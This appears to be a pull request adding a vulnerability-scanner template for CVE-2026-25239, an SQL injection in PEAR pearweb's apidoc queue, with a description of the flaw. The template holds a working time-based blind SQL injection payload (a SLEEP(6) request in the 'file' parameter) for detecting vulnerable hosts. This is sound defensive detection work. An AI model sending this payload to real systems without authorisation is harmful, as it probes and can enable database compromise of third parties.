### PR TITLE
Add CVE-2026-25239 - PEAR pearweb SQLi in Apidoc Queue

### DIFF
--- a/http/cves/2026/CVE-2026-25239.yaml
+++ b/http/cves/2026/CVE-2026-25239.yaml
@@ -1,0 +1,44 @@
+id: CVE-2026-25239
+
+info:
+  name: PEAR pearweb < 1.33.0 - SQL Injection in Apidoc Queue
+  author: bswearingen
+  severity: high
+  description: |
+    PEAR is a framework and distribution system for reusable PHP components. Prior to version 1.33.0, a SQL injection vulnerability in apidoc queue insertion can allow query manipulation if an attacker can influence the inserted filename value. This issue has been patched in version 1.33.0.
+  impact: |
+    An attacker who can influence filenames in the apidoc queue can inject arbitrary SQL.
+  remediation: |
+    Upgrade PEAR pearweb to version 1.33.0 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-25239
+    - https://github.com/pear/pearweb
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-25239
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    vendor: pear
+    product: pearweb
+  tags: cve,cve2026,pear,pearweb,sqli
+
+http:
+  - raw:
+      - |
+        GET /package-apidoc-queue.php?file=test%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(6)))a)--%20- HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+
+      - type: status
+        status:
+          - 200
+          - 302
+          - 500
+        condition: or


### PR DESCRIPTION
### Template Overview

This template detects CVE-2026-25239, a SQL injection vulnerability in PEAR pearweb's API documentation queue system.

### Vulnerability Details

**Product:** PEAR pearweb
**Affected Versions:** < 1.33.0
**Severity:** High (CVSS 7.5)
**CWE:** CWE-89 (SQL Injection)

The apidoc queue insertion functionality does not properly sanitize the filename value before including it in a SQL statement. If an attacker can influence the filename parameter (e.g., through a crafted request to the queue endpoint), they can inject arbitrary SQL and manipulate database queries.

### Detection Method

Time-based blind SQL injection via the `file` parameter on the apidoc queue endpoint. A `SLEEP(6)` payload is injected and the response delay is measured to confirm the vulnerability.

### References

- https://nvd.nist.gov/vuln/detail/CVE-2026-25239
- https://github.com/pear/pearweb